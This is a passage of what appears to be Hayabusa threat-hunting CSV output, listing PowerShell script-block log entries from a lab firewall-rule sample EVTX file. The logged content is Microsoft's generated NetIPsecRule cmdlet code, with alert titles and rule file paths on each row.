[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 
+09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) 
$__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
